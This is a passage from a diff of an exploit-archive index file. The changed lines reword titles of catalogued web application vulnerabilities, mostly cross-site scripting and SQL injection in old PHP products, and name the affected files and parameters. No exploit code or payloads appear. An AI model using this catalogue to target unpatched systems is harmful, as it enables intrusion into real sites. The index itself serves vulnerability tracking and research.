Vulnerabilities",2014-04-29,SirGod,hardware,webapps,69 33091,platforms/php/webapps/33091.txt,"NULL NUKE CMS 2.2 - Multiple Vulnerabilities",2014-04-29,LiquidWorm,php,webapps,80 33347,platforms/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 - Information Disclosure",2009-11-06,"Daniel King",jsp,webapps,0 33578,platforms/multiple/webapps/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Inclusion",2009-07-16,MustLive,multiple,webapps,0 -33097,platforms/php/webapps/33097.txt,"Programs Rating - rate.php id Parameter Cross-Site Scripting",2009-06-20,Moudi,php,webapps,0 -33098,platforms/php/webapps/33098.txt,"Programs Rating - postcomments.php id Parameter Cross-Site Scripting",2009-06-20,Moudi,php,webapps,0 +33097,platforms/php/webapps/33097.txt,"Programs Rating - 'rate.php?id' Cross-Site Scripting",2009-06-20,Moudi,php,webapps,0 +33098,platforms/php/webapps/33098.txt,"Programs Rating - 'postcomments.php?id' Cross-Site Scripting",2009-06-20,Moudi,php,webapps,0 33102,platforms/php/webapps/33102.txt,"CommuniGate Pro 5.2.14 - Web Mail URI Parsing HTML Injection",2009-06-23,"Andrea Purificato",php,webapps,0 -33106,platforms/php/webapps/33106.txt,"PG Matchmaking - browse_ladies.php show Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 -33107,platforms/php/webapps/33107.txt,"PG Matchmaking - browse_men.php show Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 -33108,platforms/php/webapps/33108.txt,"PG Matchmaking - search.php show Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 -33109,platforms/php/webapps/33109.txt,"PG Matchmaking - services.php show Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 +33106,platforms/php/webapps/33106.txt,"PG Matchmaking - 'browse_ladies.php?show' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 +33107,platforms/php/webapps/33107.txt,"PG Matchmaking - 'browse_men.php?show' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 +33108,platforms/php/webapps/33108.txt,"PG Matchmaking - 'search.php?show' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 +33109,platforms/php/webapps/33109.txt,"PG Matchmaking - 'services.php?show' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 33110,platforms/php/webapps/33110.txt,"XZeroScripts XZero Community Classifieds 4.97.8 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-24,Moudi,php,webapps,0 33111,platforms/php/webapps/33111.txt,"AIOCP 1.4 - 'cp_html2txt.php' Remote File Inclusion",2009-06-27,"Hadi Kiamarsi",php,webapps,0 -33112,platforms/php/webapps/33112.txt,"PG Roommate Finder Solution - quick_search.php part Parameter Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0 -33113,platforms/php/webapps/33113.txt,"PG Roommate Finder Solution - viewprofile.php part Parameter Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0 +33112,platforms/php/webapps/33112.txt,"PG Roommate Finder Solution - 'quick_search.php?part' Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0 +33113,platforms/php/webapps/33113.txt,"PG Roommate Finder Solution - 'viewprofile.php?part' Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0 33114,platforms/php/webapps/33114.txt,"Joomla! Component Almond Classifieds 7.5 - Cross-Site Scripting / SQL Injection",2009-06-27,Moudi,php,webapps,0 33115,platforms/php/webapps/33115.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' replid Parameter SQL Injection",2009-06-27,Moudi,php,webapps,0 -33116,platforms/php/webapps/33116.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' Multiple Parameter Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0 -33117,platforms/php/webapps/33117.txt,"AlmondSoft Classifieds Pro - gmap.php addr Parameter Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0 +33116,platforms/php/webapps/33116.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-06-27,Moudi,php,webapps,0 +33117,platforms/php/webapps/33117.txt,"AlmondSoft Classifieds Pro - 'gmap.php?addr' Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0 33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining - 'news_read.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining - 'lessons_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 -33122,platforms/php/webapps/33122.txt,"Joomla! Component com_user - 'view' Parameter URI redirection",2009-06-27,"599eme Man",php,webapps,0 -33125,platforms/php/webapps/33125.txt,"Joomla! Component Permis 1.0 (com_groups) - 'id' Parameter SQL Injection",2009-06-28,Prince_Pwn3r,php,webapps,0 +33122,platforms/php/webapps/33122.txt,"Joomla! Component com_user - 'view' URI Redirection",2009-06-27,"599eme Man",php,webapps,0 +33125,platforms/php/webapps/33125.txt,"Joomla! Component Permis 1.0 (com_groups) - 'id' SQL Injection",2009-06-28,Prince_Pwn3r,php,webapps,0 33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting",2009-06-28,Moudi,php,webapps,0 33127,platforms/php/webapps/33127.txt,"Miniweb 2.0 Site Builder Module - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,Moudi,php,webapps,0 40080,platforms/php/webapps/40080.txt,"Tiki Wiki CMS 15.0 - Arbitrary File Download",2016-07-11,"Kacper Szurek",php,webapps,80 @@ -33517,23 +33518,23 @@ id,file,description,date,author,platform,type,port 40082,platforms/php/webapps/40082.txt,"WordPress Plugin All in One SEO Pack 2.3.6.1 - Persistent Cross-Site Scripting",2016-07-11,"David Vaartjes",php,webapps,80 33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 - 'category.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 33130,platforms/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1)",2009-06-30,"Ivan Sanchez",php,webapps,0 -33131,platforms/php/webapps/33131.txt,"XOOPS 2.3.3 - 'op' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Sense of Security",php,webapps,0 +33131,platforms/php/webapps/33131.txt,"XOOPS 2.3.3 - 'op' Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Sense of Security",php,webapps,0 33132,platforms/php/webapps/33132.txt,"Softbiz Dating Script 1.0 - 'cat_products.php' SQL Injection",2009-07-30,MizoZ,php,webapps,0 33136,platforms/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution",2014-05-01,0x4148,hardware,webapps,0 -33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 - 'index.php' Multiple Parameter Cross-Site Scripting",2009-11-10,"Andrew Horton",php,webapps,0 +33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-10,"Andrew Horton",php,webapps,0 33138,platforms/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",hardware,webapps,0 33144,platforms/php/webapps/33144.txt,"Censura < 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,mark99,php,webapps,0 33146,platforms/php/webapps/33146.txt,"CS-Cart 2.0.5 - 'reward_points.post.php' SQL Injection",2009-08-04,"Ryan Dewhurst",php,webapps,0 -33147,platforms/php/webapps/33147.txt,"AJ Auction Pro 3.0 - 'txtkeyword' Parameter Cross-Site Scripting",2009-08-05,"599eme Man",php,webapps,0 +33147,platforms/php/webapps/33147.txt,"AJ Auction Pro 3.0 - 'txtkeyword' Cross-Site Scripting",2009-08-05,"599eme Man",php,webapps,0 33149,platforms/php/webapps/33149.txt,"Alkacon OpenCMS 7.x - Multiple Input Validation Vulnerabilities",2009-08-06,"Katie French",php,webapps,0 33346,platforms/jsp/webapps/33346.txt,"McAfee Network Security Manager 5.1.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-11-06,"Daniel King",jsp,webapps,0 -33152,platforms/php/webapps/33152.txt,"PhotoPost PHP 3.3.1 - 'cat' Parameter Cross-Site Scripting / SQL Injection",2009-08-07,"599eme Man",php,webapps,0 +33152,platforms/php/webapps/33152.txt,"PhotoPost PHP 3.3.1 - 'cat' Cross-Site Scripting / SQL Injection",2009-08-07,"599eme Man",php,webapps,0 33153,platforms/php/webapps/33153.txt,"SupportPRO SupportDesk 3.0 - 'shownews.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 33154,platforms/php/webapps/33154.txt,"SQLiteManager 1.2 - 'main.php' Cross-Site Scripting",2009-08-10,"Hadi Kiamarsi",php,webapps,0 -33155,platforms/php/webapps/33155.txt,"ViArt CMS - forums.php category_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 +33155,platforms/php/webapps/33155.txt,"ViArt CMS - 'forums.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 33156,platforms/php/webapps/33156.txt,"Crime24 Stealer Panel 1.0 - Multiple Vulnerabilities",2014-05-03,"Daisuke Dan",php,webapps,0 -33157,platforms/php/webapps/33157.txt,"ViArt CMS - forum.php forum_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 -33158,platforms/php/webapps/33158.txt,"ViArt CMS - forum_topic_new.php forum_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 +33157,platforms/php/webapps/33157.txt,"ViArt CMS - 'forum.php?forum_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 +33158,platforms/php/webapps/33158.txt,"ViArt CMS - 'forum_topic_new.php?forum_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 33159,platforms/hardware/webapps/33159.txt,"Seagate BlackArmor NAS - Multiple Vulnerabilities",2014-05-03,"Shayan S",hardware,webapps,0 33160,platforms/php/webapps/33160.txt,"Papoo 3.x - Upload Images Arbitrary File Upload",2009-08-10,"RedTeam Pentesting GmbH",php,webapps,0 33166,platforms/php/webapps/33166.txt,"Discuz! 6.0 - '2fly_gift.php' SQL Injection",2009-08-15,Securitylab.ir,php,webapps,0 @@ -33547,9 +33548,9 @@ id,file,description,date,author,platform,type,port 40346,platforms/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",multiple,webapps,0 33180,platforms/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x - 'index.template.html' Cross-Site Scripting",2009-08-19,"Adam Bixby",multiple,webapps,0 33181,platforms/java/webapps/33181.txt,"Computer Associates SiteMinder - Unicode Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",java,webapps,0 -33186,platforms/php/webapps/33186.txt,"VideoGirls - forum.php t Parameter Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 -33187,platforms/php/webapps/33187.txt,"VideoGirls - profile.php profile_name Parameter Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 -33188,platforms/php/webapps/33188.txt,"VideoGirls - view.php p Parameter Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 +33186,platforms/php/webapps/33186.txt,"VideoGirls - 'forum.php?t' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 +33187,platforms/php/webapps/33187.txt,"VideoGirls - 'profile.php?profile_name' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 +33188,platforms/php/webapps/33188.txt,"VideoGirls - 'view.php?p' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 33189,platforms/php/webapps/33189.txt,"PHP-Fusion 6.1.18 - Multiple Information Disclosure Vulnerabilities",2009-08-26,Inj3ct0r,php,webapps,0 33190,platforms/php/webapps/33190.txt,"OpenAutoClassifieds 1.5.9 - SQL Injection",2009-08-25,"Andrew Horton",php,webapps,0 33191,platforms/php/webapps/33191.txt,"FlexCMS 2.5 - 'CookieUsername' Cookie Parameter SQL Injection",2009-08-28,Inj3ct0r,php,webapps,0 @@ -33558,13 +33559,13 @@ id,file,description,date,author,platform,type,port 33200,platforms/php/webapps/33200.txt,"68 Classifieds 4.1 - 'toplistings.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 33201,platforms/php/webapps/33201.txt,"68 Classifieds 4.1 - 'viewlisting.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 33202,platforms/php/webapps/33202.txt,"68 Classifieds 4.1 - 'viewmember.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 -33204,platforms/php/webapps/33204.txt,"phpAuction 3.2 - 'lan' Parameter Remote File Inclusion",2009-09-09,"Beenu Arora",php,webapps,0 -33206,platforms/php/webapps/33206.txt,"MKPortal 1.x - Multiple Modules Cross-Site Scripting Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0 +33204,platforms/php/webapps/33204.txt,"phpAuction 3.2 - 'lan' Remote File Inclusion",2009-09-09,"Beenu Arora",php,webapps,0 +33206,platforms/php/webapps/33206.txt,"MKPortal 1.x (Multiple Modules) - Cross-Site Scripting",2009-08-31,Inj3ct0r,php,webapps,0 33208,platforms/php/webapps/33208.txt,"MKPortal 1.x - Multiple BBCode HTML Injection Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0 33209,platforms/jsp/webapps/33209.txt,"Adobe RoboHelp Server 8 - Authentication Bypass",2009-09-03,Intevydis,jsp,webapps,0 33214,platforms/php/webapps/33214.txt,"DvBBS 2.0 - 'boardrule.php' SQL Injection",2009-09-04,Securitylab.ir,php,webapps,0 -33217,platforms/php/webapps/33217.txt,"Joomla! Component com_pressrelease - 'id' Parameter SQL Injection",2009-09-10,Moudi,php,webapps,0 -33218,platforms/php/webapps/33218.txt,"Joomla! Component com_mediaalert - 'id' Parameter SQL Injection",2009-09-11,Moudi,php,webapps,0 +33217,platforms/php/webapps/33217.txt,"Joomla! Component com_pressrelease - 'id' SQL Injection",2009-09-10,Moudi,php,webapps,0 +33218,platforms/php/webapps/33218.txt,"Joomla! Component com_mediaalert - 'id' SQL Injection",2009-09-11,Moudi,php,webapps,0 33219,platforms/php/webapps/33219.txt,"Planet 2.0 - HTML Injection",2009-09-11,"Steve Kemp",php,webapps,0 33226,platforms/php/webapps/33226.txt,"Mega File Hosting Script 1.2 - 'emaillinks.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 33227,platforms/php/webapps/33227.txt,"TuttoPHP Morris Guestbook - 'view.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 @@ -33578,37 +33579,37 @@ id,file,description,date,author,platform,type,port 33241,platforms/php/webapps/33241.txt,"Vastal I-Tech DVD Zone - 'view_mag.php' Cross-Site Scripting",2009-09-22,OoN_Boy,php,webapps,0 33242,platforms/php/webapps/33242.txt,"Vastal I-Tech Agent Zone - SQL Injection",2009-09-23,OoN_Boy,php,webapps,0 33345,platforms/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module - doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",php,webapps,0 -33343,platforms/php/webapps/33343.txt,"CuteNews 1.4.6 - 'result' Parameter Cross-Site Scripting",2009-11-10,"Andrew Horton",php,webapps,0 +33343,platforms/php/webapps/33343.txt,"CuteNews 1.4.6 - 'result' Cross-Site Scripting",2009-11-10,"Andrew Horton",php,webapps,0 33344,platforms/php/webapps/33344.txt,"CuteNews 1.4.6 - 'index.php' Cross-Site Request Forgery (New User Creation)",2009-11-10,"Andrew Horton",php,webapps,0 -33709,platforms/php/webapps/33709.txt,"Natychmiast CMS - Multiple Cross-Site Scripting / SQL Injection",2010-03-05,"Maciej Gojny",php,webapps,0 +33709,platforms/php/webapps/33709.txt,"Natychmiast CMS - Multiple Cross-Site Scripting / SQL Injections",2010-03-05,"Maciej Gojny",php,webapps,0 33247,platforms/hardware/webapps/33247.txt,"OpenFiler 2.99.1 - Arbitrary Code Execution",2014-05-08,"Dolev Farhi",hardware,webapps,0 33248,platforms/hardware/webapps/33248.txt,"OpenFiler 2.99.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-05-08,"Dolev Farhi",hardware,webapps,0 33249,platforms/php/webapps/33249.txt,"Collabtive 1.2 - SQL Injection",2014-05-08,"Deepak Rathore",php,webapps,0 33250,platforms/php/webapps/33250.txt,"Collabtive 1.2 - Persistent Cross-Site Scripting",2014-05-08,"Deepak Rathore",php,webapps,0 33252,platforms/php/webapps/33252.txt,"Cobbler 2.4.x < 2.6.x - Local File Inclusion",2014-05-08,"Dolev Farhi",php,webapps,0 33256,platforms/php/webapps/33256.txt,"e107 0.7.x - CAPTCHA Security Bypass / Cross-Site Scripting",2009-09-28,MustLive,php,webapps,0 -33262,platforms/php/webapps/33262.txt,"Interspire Knowledge Manager 5 - 'p' Parameter Directory Traversal",2009-09-29,"Infected Web",php,webapps,0 -33266,platforms/php/webapps/33266.txt,"Joomla! Component CB Resume Builder - 'group_id' Parameter SQL Injection",2009-10-05,kaMtiEz,php,webapps,0 -33267,platforms/php/webapps/33267.txt,"X-Cart Email Subscription - 'email' Parameter Cross-Site Scripting",2009-10-06,"Paulo Santos",php,webapps,0 +33262,platforms/php/webapps/33262.txt,"Interspire Knowledge Manager 5 - 'p' Directory Traversal",2009-09-29,"Infected Web",php,webapps,0 +33266,platforms/php/webapps/33266.txt,"Joomla! Component CB Resume Builder - 'group_id' SQL Injection",2009-10-05,kaMtiEz,php,webapps,0 +33267,platforms/php/webapps/33267.txt,"X-Cart Email Subscription - 'email' Cross-Site Scripting",2009-10-06,"Paulo Santos",php,webapps,0 33268,platforms/asp/webapps/33268.html,"AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,"Sébastien Duquette",asp,webapps,0 33590,platforms/php/webapps/33590.txt,"Joomla! Component AutartiTarot - Directory Traversal",2010-02-01,B-HUNT3|2,php,webapps,0 -33342,platforms/php/webapps/33342.txt,"CuteNews 1.4.6 - search.php Multiple Parameter Cross-Site Scripting",2009-11-10,"Andrew Horton",php,webapps,0 +33342,platforms/php/webapps/33342.txt,"CuteNews 1.4.6 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-10,"Andrew Horton",php,webapps,0 33281,platforms/php/webapps/33281.txt,"Achievo 1.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2009-10-13,"Ryan Dewhurst",php,webapps,0 33282,platforms/php/webapps/33282.txt,"Dream Poll 3.1 - 'index.php' Cross-Site Scripting / SQL Injection",2009-10-13,infosecstuff,php,webapps,0 33284,platforms/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2009-10-14,euronymous,multiple,webapps,0 33317,platforms/php/webapps/33317.txt,"Alienvault Open Source SIEM (OSSIM) 4.6.1 - Authenticated SQL Injection (Metasploit)",2014-05-12,"Chris Hebert",php,webapps,443 -33286,platforms/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 - 'run?__report' Parameter Cross-Site Scripting",2009-10-14,"Michele Orru",java,webapps,0 -33287,platforms/php/webapps/33287.txt,"BloofoxCMS 0.3.5 - 'search' Parameter Cross-Site Scripting",2009-10-15,"drunken danish rednecks",php,webapps,0 -33288,platforms/php/webapps/33288.txt,"Zainu 1.0 - 'searchSongKeyword' Parameter Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0 -33290,platforms/php/webapps/33290.txt,"Snitz Forums 2000 3.4.7 - pop_send_to_friend.asp url Parameter Cross-Site Scripting",2009-10-15,"Andrea Fabrizi",php,webapps,0 +33286,platforms/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 - 'run?__report' Cross-Site Scripting",2009-10-14,"Michele Orru",java,webapps,0 +33287,platforms/php/webapps/33287.txt,"BloofoxCMS 0.3.5 - 'search' Cross-Site Scripting",2009-10-15,"drunken danish rednecks",php,webapps,0 +33288,platforms/php/webapps/33288.txt,"Zainu 1.0 - 'searchSongKeyword' Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0 +33290,platforms/php/webapps/33290.txt,"Snitz Forums 2000 3.4.7 - 'pop_send_to_friend.asp?url' Cross-Site Scripting",2009-10-15,"Andrea Fabrizi",php,webapps,0 33291,platforms/php/webapps/33291.txt,"Snitz Forums 2000 3.4.7 - Sound Tag Onload Attribute Cross-Site Scripting",2009-10-15,"Andrea Fabrizi",php,webapps,0 33292,platforms/jsp/webapps/33292.txt,"IBM Rational RequisitePro 7.10 - ReqWeb Help Feature ReqWebHelp/advanced/workingSet.jsp Operation Parameter Cross-Site Scripting",2009-10-15,IBM,jsp,webapps,0 -33293,platforms/jsp/webapps/33293.txt,"IBM Rational RequisitePro 7.10 - ReqWeb Help Feature ReqWebHelp/basic/searchView.jsp Multiple Parameter Cross-Site Scripting",2009-10-15,IBM,jsp,webapps,0 +33293,platforms/jsp/webapps/33293.txt,"IBM Rational RequisitePro 7.10 - ReqWeb Help Feature 'ReqWebHelp/basic/searchView.jsp' Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,IBM,jsp,webapps,0 33294,platforms/php/webapps/33294.txt,"TBmnetCMS 1.0 - Cross-Site Scripting",2009-10-19,"drunken danish rednecks",php,webapps,0 -33295,platforms/php/webapps/33295.txt,"OpenDocMan 1.2.5 - add.php last_message Parameter Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 -33296,platforms/php/webapps/33296.txt,"OpenDocMan 1.2.5 - toBePublished.php Multiple Parameter Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 +33295,platforms/php/webapps/33295.txt,"OpenDocMan 1.2.5 - 'add.php?last_message' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 +33296,platforms/php/webapps/33296.txt,"OpenDocMan 1.2.5 - 'toBePublished.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-21,"Amol Naik",php,webapps,0 33297,platforms/php/webapps/33297.txt,"OpenDocMan 1.2.5 - 'index.php' last_message Parameter Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 -33298,platforms/php/webapps/33298.txt,"OpenDocMan 1.2.5 - admin.php last_message Parameter Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 +33298,platforms/php/webapps/33298.txt,"OpenDocMan 1.2.5 - 'admin.php?last_message' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 33299,platforms/php/webapps/33299.txt,"OpenDocMan 1.2.5 - category.php Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 33300,platforms/php/webapps/33300.txt,"OpenDocMan 1.2.5 - department.php Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 33301,platforms/php/webapps/33301.txt,"OpenDocMan 1.2.5 - profile.php Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 @@ -33616,140 +33617,140 @@ id,file,description,date,author,platform,type,port 33303,platforms/php/webapps/33303.txt,"OpenDocMan 1.2.5 - search.php Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 33304,platforms/php/webapps/33304.txt,"OpenDocMan 1.2.5 - user.php Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 33305,platforms/php/webapps/33305.txt,"OpenDocMan 1.2.5 - view_file.php Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 -33307,platforms/php/webapps/33307.php,"RunCMS - 'forum' Parameter SQL Injection",2009-10-26,Nine:Situations:Group::bookoo,php,webapps,0 -33308,platforms/php/webapps/33308.txt,"Sahana 0.6.2 - 'mod' Parameter Local File Disclosure",2009-10-27,"Greg Miernicki",php,webapps,0 -33309,platforms/php/webapps/33309.txt,"TFTgallery 0.13 - 'album' Parameter Cross-Site Scripting",2009-10-26,blake,php,webapps,0 -33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 - 'sample' Parameter Cross-Site Scripting",2009-11-02,blake,php,webapps,0 -33327,platforms/hardware/webapps/33327.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Information Disclosure",2014-05-12,"Luigi Vezzoso",hardware,webapps,0 -33341,platforms/php/webapps/33341.txt,"CuteNews 1.4.6 - 'from_date_day' Parameter Full Path Disclosure",2009-11-10,"Andrew Horton",php,webapps,0 +33307,platforms/php/webapps/33307.php,"RunCMS - 'forum' SQL Injection",2009-10-26,Nine:Situations:Group::bookoo,php,webapps,0 +33308,platforms/php/webapps/33308.txt,"Sahana 0.6.2 - 'mod' Local File Disclosure",2009-10-27,"Greg Miernicki",php,webapps,0 +33309,platforms/php/webapps/33309.txt,"TFTgallery 0.13 - 'album' Cross-Site Scripting",2009-10-26,blake,php,webapps,0 +33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 - 'sample' Cross-Site Scripting",2009-11-02,blake,php,webapps,0 +33327,platforms/hardware/webapps/33327.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Information Disclosures",2014-05-12,"Luigi Vezzoso",hardware,webapps,0 +33341,platforms/php/webapps/33341.txt,"CuteNews 1.4.6 - 'from_date_day' Full Path Disclosure",2009-11-10,"Andrew Horton",php,webapps,0 33330,platforms/windows/webapps/33330.txt,"SpiceWorks 7.2.00174 - Persistent Cross-Site Scripting",2014-05-12,"Dolev Farhi",windows,webapps,80 33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80 33353,platforms/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,hardware,webapps,80 -33354,platforms/php/webapps/33354.txt,"PHD Help Desk 1.43 - area.php Multiple Parameter Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 -33355,platforms/php/webapps/33355.txt,"PHD Help Desk 1.43 - solic_display.php q_registros Parameter Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 -33356,platforms/php/webapps/33356.txt,"PHD Help Desk 1.43 - area_list.php Multiple Parameter Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 -33357,platforms/php/webapps/33357.txt,"PHD Help Desk 1.43 - atributo.php URL Parameter Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 -33358,platforms/php/webapps/33358.txt,"PHD Help Desk 1.43 - atributo_list.php Multiple Parameter Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 -33359,platforms/php/webapps/33359.txt,"PHD Help Desk 1.43 - caso_insert.php URL Parameter Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 -33361,platforms/asp/webapps/33361.txt,"Multiple JiRo's Products - 'files/login.asp' Multiple SQL Injections",2009-11-17,blackenedsecurity,asp,webapps,0 -33362,platforms/php/webapps/33362.txt,"CubeCart 3.0.4/4.3.6 - 'ProductID' Parameter SQL Injection",2009-11-19,"Sangte Amtham",php,webapps,0 -33365,platforms/php/webapps/33365.txt,"WordPress Plugin WP-phpList 2.10.2 - 'unsubscribeemail' Parameter Cross-Site Scripting",2009-11-29,MustLive,php,webapps,0 +33354,platforms/php/webapps/33354.txt,"PHD Help Desk 1.43 - 'area.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0 +33355,platforms/php/webapps/33355.txt,"PHD Help Desk 1.43 - 'solic_display.php?q_registros' Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 +33356,platforms/php/webapps/33356.txt,"PHD Help Desk 1.43 - 'area_list.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0 +33357,platforms/php/webapps/33357.txt,"PHD Help Desk 1.43 - 'atributo.php?URL' Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 +33358,platforms/php/webapps/33358.txt,"PHD Help Desk 1.43 - 'atributo_list.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0 +33359,platforms/php/webapps/33359.txt,"PHD Help Desk 1.43 - 'caso_insert.php?URL' Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 +33361,platforms/asp/webapps/33361.txt,"JiRo's (Multiple Products) - 'files/login.asp' Multiple SQL Injections",2009-11-17,blackenedsecurity,asp,webapps,0 +33362,platforms/php/webapps/33362.txt,"CubeCart 3.0.4/4.3.6 - 'ProductID' SQL Injection",2009-11-19,"Sangte Amtham",php,webapps,0 +33365,platforms/php/webapps/33365.txt,"WordPress Plugin WP-phpList 2.10.2 - 'unsubscribeemail' Cross-Site Scripting",2009-11-29,MustLive,php,webapps,0 40345,platforms/php/webapps/40345.txt,"FreePBX 13.0.x < 13.0.154 - Unauthenticated Remote Command Execution",2016-09-07,i-Hmx,php,webapps,0 -33366,platforms/php/webapps/33366.txt,"WordPress Plugin Trashbin 0.1 - 'mtb_undelete' Parameter Cross-Site Scripting",2009-11-15,MustLive,php,webapps,0 +33366,platforms/php/webapps/33366.txt,"WordPress Plugin Trashbin 0.1 - 'mtb_undelete' Cross-Site Scripting",2009-11-15,MustLive,php,webapps,0 33367,platforms/php/webapps/33367.txt,"WordPress Plugin Firestats 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,php,webapps,0 33368,platforms/php/webapps/33368.html,"WordPress Plugin Firestats 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps,0 33370,platforms/multiple/webapps/33370.html,"ElasticSearch - Remote Code Execution",2014-05-15,"Jeff Geiger",multiple,webapps,0 